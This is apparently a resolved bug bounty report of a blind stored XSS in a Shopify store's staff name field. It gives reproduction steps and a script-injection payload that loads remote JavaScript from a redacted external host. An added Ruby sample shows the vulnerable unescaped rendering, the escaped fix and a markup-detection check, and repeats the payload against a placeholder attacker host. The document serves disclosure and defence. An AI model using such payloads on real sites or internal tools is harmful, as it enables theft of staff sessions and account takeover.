Blind Stored XSS Via Staff Name
High
## Vulnerability Details
Hey Team, I found a blind stored XSS when I add a staff name in https://your-store.myshopify.com/admin/settings/account
Steps to reproduce:
1. Go to https://your-store.myshopify.com/admin/settings/account
2. Add Staff Account
3. Fill First & Last Name with this payload "><script>$.getScript("//█████████.xss.ht")</script>
4. The XSS will fire in your internal web app
You should check the DOM.html, guys.
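As an added example that is not part of the report or of Shopify's own code: a Ruby sketch of how an unescaped staff name ends up as live markup, the escaped rendering that neutralises it, and an input check that flags markup in a name field so the save can be logged or rejected. The script host in the sample payload is a constructed placeholder, not the redacted one above.

```ruby
require "cgi"

# Constructed sample input modelled on the report's payload; the external
# host is a placeholder, not the redacted one from the report.
PAYLOAD = '"><script>$.getScript("//attacker.example")</script>'

# How the bug arises: the staff name is interpolated straight into markup,
# so the leading quote closes the attribute and the rest opens a script tag.
def render_staff_unescaped(first, last)
  %(<input value="#{first} #{last}">)
end

# Fix: escape at the HTML output point (this applies to the admin page and
# to any internal tool that later shows the name). CGI.escapeHTML turns
# <, >, &, " and ' into entities, so the name can no longer break out.
def render_staff_escaped(first, last)
  %(<input value="#{CGI.escapeHTML(first)} #{CGI.escapeHTML(last)}">)
end

# Defence in depth for a name field: flag values that carry tag or attribute
# syntax. Apostrophes and hyphens are normal in names, so they are not flagged.
MARKUP = /[<>"]|javascript:|on\w+\s*=/i
def suspicious_name?(name)
  !!(name =~ MARKUP)
end

# Helper used to confirm whether rendered HTML still carries a raw script tag.
def contains_script?(html)
  html.include?("<script")
end

if __FILE__ == $PROGRAM_NAME
  puts render_staff_unescaped(PAYLOAD, "Doe")
  puts render_staff_escaped(PAYLOAD, "Doe")
  puts suspicious_name?(PAYLOAD)
end
```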
## Impact
Stored XSS
## Report Stats
- Report ID: 948929
- State: Closed
- Substate: resolved
- Upvotes: 38